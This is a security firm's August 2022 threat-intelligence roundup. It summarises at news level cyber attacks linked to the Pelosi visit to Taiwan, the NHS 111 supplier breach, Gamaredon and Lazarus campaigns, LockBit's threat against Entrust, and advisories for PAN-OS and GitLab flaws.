Threat Intel Roundup

Published: 31 August 2022

Under
Attack?

Content

01. Summary
02. Threat Spotlight

  • Pelosi visit encourages PRC-Taiwan cyber attacks

  • British “111” NHS hit by cyber attack

  • Gamaredon Group delivers infostealer to Ukrainian targets

  • Lazarus Group lures job seekers with fake employee prospects

03. Quick News Bites

  • LockBit under DDoS attack: Entrust strikes back?

  • CISA warns of high-severity flaw, requires government patching

  • GitLab discovers critical RCE vulnerability

04. Conclusion

A Note From The Cyber Threat Response Team

Sometimes a bit of luck can tip a victim off to a threat actor in their network. Take one case for example, where a company’s database server suddenly crashed, despite having a substantial amount of computing resources available. The database engineers investigated and found that a database dump, compression and export command had been attempted on the server in the early hours that morning. Subsequent investigation found that a threat actor was stealing data prior to encrypting in a ransomware attack. The lesson here is that company’s should never rely purely on security events to detect a breach. Sometimes a crash or other non-security related anomaly could indicate something bad is about to happen. We’ve observed attackers that are purposely very quiet, and those that do not care about the noise they create. This also depends on the stage of the attack. Generally speaking the earlier on in the attack chain they are, the quieter they will try and be.

Threat Spotlight

Pelosi visit encourages PRC-Taiwan cyber attacks

In early August, the US House of Representatives Speaker Nancy Pelosi visited Taiwan to reiterate US support to Taipei. This diplomatic mission caused further strain on the complicated relationship between the PRC and Taiwan. After threatening “severe consequences” if Taiwan allowed Pelosi to visit, Beijing carried out several military drills off the coasts of Taiwan to display its strength and disapproval of Pelosi’s mission. As often happens during tense geopolitical situations, the parties involved inconspicuously exchanged low-intensity cyber activity. Since Pelosi landed in Taiwan on 02 Aug 2022, the following malicious cyber activity was observed:

  • Between 02 and 04 Aug 2022, the websites of Taiwan’s presidential office and Taiwan’s defense and foreign ministries were targeted by a distributed denial of service (DDoS) attack. No one has claimed responsibility for the attack, but the source IP addresses of the attack originated from outside of Taiwan.
  • On 03 Aug 2022, members of the hacktivist group “Anonymous” reportedly defaced the webpage of the Heilongjiang Provincial Federation of Social Sciences (“hljskl[.]gov[.]cn”), a Chinese government institution. According to an archived version of the webpage, the defaced version included statements of support for Taiwan, as well as images of Nancy Pelosi and Taiwan President Tsai Ing-wen.
  • On 04 Aug 2022, advanced persistent threat (APT) group “APT27” (aka Emissary Panda, Bronze Union, Iron Tiger) allegedly shut down 60,000 Taiwanese Internet of Things (IoT) devices. The group, which likely operates on behalf of the PRC state, has since reportedly also claimed responsibility for DDoS attacks against Taiwanese government ministries.
  • On 04 Aug 2022, researchers observed a new disinformation campaign dubbed HaiEnergy. The campaign reportedly distributed fake news articles on subjects supporting the interests of the PRC. The major themes included Pelosi’s visit, Hong Kong’s electoral reform, and the treatment of the Uyghur population in the PRC.

British “111” NHS hit by cyber attack

On 04 Aug 2022, a cyber attack targeted Advanced, a managed service provider (MSP) that provides IT and software services to clients including the UK’s National Health Service (NHS). The attack impacted the NHS 111 emergency service, causing severe delays to ambulances and general practitioners’ appointments. This instance highlights how MSPs can be valuable targets for threat actors, propagating their attacks’ impacts to multiple victims at the same time.

Gamaredon Group delivers infostealer to Ukrainian targets

On 15 Aug 2022, security researchers reported that “Gamaredon Group” has been conducting a cyber-espionage campaign targeting Ukraine. Activity was first observed on 15 Jul 2022, and most recently on 08 Aug 2022. The group reportedly delivered variants of a PowerShell information stealer (infostealer) to Ukrainian targets, as well as custom backdoors, including “Pterodo” and “Giddome”. Researchers believe that the malware was delivered via spearphishing emails, likely with lures pertaining to the Russia-Ukraine war.

Lazarus Group lures job seekers with fake employee prospects

On 17 Aug 2022, researchers reported that the North Korea-linked APT “Lazarus Group” had been using a signed malicious executable designed to target macOS systems. Lazarus Group members were impersonating employees of the cryptocurrency-exchange company Coinbase, targeting job seekers in the financial technology sector. The campaign targeted new and old macOS versions, and used malware disguised as a PDF file containing a fake job description. The macOS malware was code-signed on 21 Jul 2022 with a certificate that was issued five months prior to a developer using the name Shankey Nohria. As of 12 Aug 2022, the certificate had not been revoked by Apple, but had not been checked by Apple’s process to discover malicious software components.

Quick News Bites

LockBit under DDoS attack: Entrust strikes back?

On 18 Aug 2022, the LockBit ransomware group threatened to leak the data of the company Entrust on the group’s darkweb data-leak site. Entrust is a US-based cyber-security firm whose offerings to companies include cloud security, identity verification, and secure payments. Entrust was reportedly breached by LockBit in June 2022 and the firm confirmed the breach to customers in a July 2022 notification. Following a series of unsuccessful negotiations, which likely ended without a ransom payment, LockBit named Entrust on its site and threatened to leak its data.

CISA warns of high-severity flaw, requires government patching

On 22 Aug 2022, the US Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory warning of a vulnerability found in Palo Alto Networks’ PAN-OS: CVE-2022-0028. The flaw allows a remote threat actor to deploy DDoS against devices without authentication. Several PA-Series, VM-Series, and CN-Series Palo Alto devices are reportedly affected by the vulnerability. Palo Alto has released patches for all devices, and CISA has advised US federal agencies to apply fixes by 09 Sep 2022.

GitLab discovers critical RCE vulnerability

On 24 Aug 2022, GitLab—a code repository and software development platform—warned users of a critical RCE vulnerability affecting all versions of GitLab from 11.3.4 to 15.1.4, as well as those between 15.2 and 15.2.3, and 15.3. The vulnerability allows attackers to perform RCE via a GitLab tool used for importing software projects from GitHub to GitLab. RCE vulnerabilities may allow attackers to take control of affected servers, steal or delete source code, or perform malicious code commits.

Closing Summary

If you are worried about any of the threats outlined in this bulletin, or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively email us at TBD@integrity360.com for a complimentary, no-commitments consultation. Also feel free to explore the many cyber security resources available on our website at https://www.integrity360.com/resources.

Disclaimer

The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.

Need advice?

If you are worried about any of the threats outlined in this roundup or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager or fill in the form for a complimentary no-commitment consultation.

More detailed threat intelligence news?

If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.

We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.

Latest Threat Insights

Advisory: CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway

Advisory: CVE-2024-3400 PAN-OS: OS Command Injection Vulnerability in GlobalProtect Gateway

Read More
The Top Reported Cyber Security Incidents of 2023

The Top Reported Cyber Security Incidents of 2023

Read More
Get to grips with Threat Exposure Management this Computer Security Day

Get to grips with Threat Exposure Management this Computer Security Day

Read More